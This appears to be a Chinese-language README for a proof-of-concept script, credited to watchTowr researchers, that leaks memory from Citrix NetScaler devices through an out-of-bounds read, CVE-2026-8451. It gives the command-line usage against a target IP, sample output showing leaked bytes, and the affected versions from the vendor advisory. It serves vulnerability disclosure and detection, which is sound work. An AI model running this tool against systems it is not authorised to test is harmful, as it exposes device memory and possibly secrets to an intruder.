Citrix Netscaler 越界读取检测构件生成工具!
此检测构件生成器将接受目标 Netscaler 设备,并尝试通过 CVE-2026-8451 泄露内存。
只需提供目标系统。包含协议,例如 https://192.168.80.125。
以下是它泄露部分内存的示例:
$ python3 watchTowr-vs-Netscaler-CVE-2026-8451.py https://192.168.80.125
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Netscaler-CVE-2026-8451.py
(*) CVE-2026-8451 Citrix Netscaler 内存越界读取检测构件生成器
- Aliz (@alizTheHax0r) of watchTowr (@watchTowrcyber)
泄露的字节:
00000000 f0 0d 90 74 3d ef be ad de 41 41 41 41 41 41 41 |...t=....AAAAAAA|
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
...
根据厂商公告:
以下支持的 NetScaler ADC 和 NetScaler Gateway 版本受影响:
NetScaler ADC 和 NetScaler Gateway 14.1 BEFORE 14.1-72.61
NetScaler ADC 和 NetScaler Gateway 13.1 BEFORE 13.1-63.18
NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
NetScaler ADC FIPS 和 NDcPP BEFORE 13.1-37.272
获取最新安全研究,请关注 watchTowr 实验室团队